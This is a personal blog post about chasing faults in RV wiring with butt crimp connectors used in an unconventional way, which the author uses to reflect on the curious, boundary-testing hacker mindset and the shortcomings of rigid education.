I was arguing with the wiring in a little RV over the weekend, and it was the typical RV mix of automotive wiring, household wiring, and What The Expletive wiring. I fell back to my auto mechanic days and set about chasing the demons through the wires. Basic diagnostics: separate, isolate, test, reconnect, retest, repeat, until a path becomes clear. In this quest I used an old trick of mine (although I assume many others have used it) of using crimp connectors the "wrong" way. This made me think of being called out for it many years ago: "you're doing it wrong, you idiot!" or something like that. I tried to explain that I was just using common butt connectors in a different way for a different situation, but he wouldn't hear of it. "That's not how you use them" was the answer.

This was long before my computer and hacker days, but the mindset is there in many car guys. “You’re not supposed to do that” is a warning to most, but an invitation to many of us.

I hate to say we can’t teach that, but with a lot of folks you either have that curiosity or you don’t. I do think a lot more folks have that kind of innate curiosity and desire to test boundaries, but sadly our modern education systems can’t handle those characteristics in kids- “do it our way or you are wrong” is great for standardized testing, but terrible for education. And in our little world of cyberthings we really need curious people, people who ask questions like

Why?

Why not?

What if?

Hold my beer…

OK, the last wasn’t a question, but a statement of willingness to try.

I don’t have the answer, but I have seen a lot of little things which help- hackerspaces, makerspaces, good STEM/STEAM programs, and youth programs at hacker/security cons are great steps, but I fear that these only serve to minimize the damage done by the state of education in the US lately.

So yeah, I guess I’m just complaining. Again.

Oh, and about using the connectors wrong: normally you put one stripped end of a wire in each end of the connector and create an inline splice. For problem situations I connect wires as shown in the image. This provides a good connection, arguably better than the inline method since the wires are directly touching. More importantly, the open ends of the connectors are shielded to prevent accidental contact, yet open enough to provide handy test points as you chase the demons through the wires. Which reminds me of another story, but that's one for the barstool…

[Image: "Wrong"]

Jack